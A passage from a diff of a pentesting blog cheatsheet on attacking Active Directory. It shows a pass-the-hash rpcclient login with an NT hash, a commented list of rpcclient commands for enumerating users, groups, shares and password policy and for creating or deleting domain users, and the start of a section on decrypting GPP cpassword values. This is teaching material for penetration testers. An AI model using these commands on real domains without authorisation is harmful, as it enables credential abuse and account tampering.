Vorkharium/vorkharium.github.io/_posts/2024-11-01-Attacking-Active-Directory-Cheatsheet.md

 rpcclient //172.16.150.10 -U vorkharium.com/john%1a06b4248879e68a498d3bac51bf91c9 --pw-nt-hash

 # All RPC Queries
-srvinfo
-enumdomusers # Users
-enumpriv # Works like "whoami /priv" queryuser john # Detailed user info getuserdompwinfo <RID> # Password Policy, use the previous command "queryuser" to get the RID to run this command lookupnames john # SID of specified user createdomuser john # Create a new user deletedomuser john # Delete user enumdomains enumdomgroups querygroup <group-RID> # Use the previous command "enumdomgroups" to get the RID to run this command querydispinfo # Show description of all users netshareenum # Enumerate Shares (This will only work if the current user we used to log in has permissions) netshareenumall lsaenumsid # SID from all users
+srvinfo                   # Retrieves server information, including the OS version and domain. enumdomusers              # Enumerates domain users, listing all users in the specified domain. enumpriv                  # Enumerates the current user's privileges, similar to the "whoami /priv" command. queryuser john            # Retrieves detailed information for the specified user (e.g., 'john'). getuserdompwinfo <RID>    # Retrieves the domain password policy for a specific user, requires the user's RID from "queryuser". lookupnames john          # Finds and displays the SID (Security Identifier) for the specified user (e.g., 'john'). createdomuser john        # Creates a new user in the domain with the specified username (e.g., 'john'). deletedomuser john        # Deletes the specified user from the domain (e.g., 'john'). enumdomains               # Lists all domains that are accessible within the current network. enumdomgroups             # Lists all groups in the domain, including their names and RIDs. querygroup <group-RID>    # Displays detailed information for a specific group, requires the group's RID from "enumdomgroups". querydispinfo             # Lists descriptions of all users in the domain. netshareenum              # Enumerates all shared network resources, requires necessary permissions of the current user. netshareenumall           # Enumerates all shared network resources, regardless of user permissions. lsaenumsid                # Lists SIDs for all users on the system.
 ```
 ### GPP cpassword
 Check if we can find a file called Groups.xml inside SYSVOL folder through SMB Shares access.
 This file contains a "cpassword" field.
 To decrypt the hash in the cpassword field we can use the following command: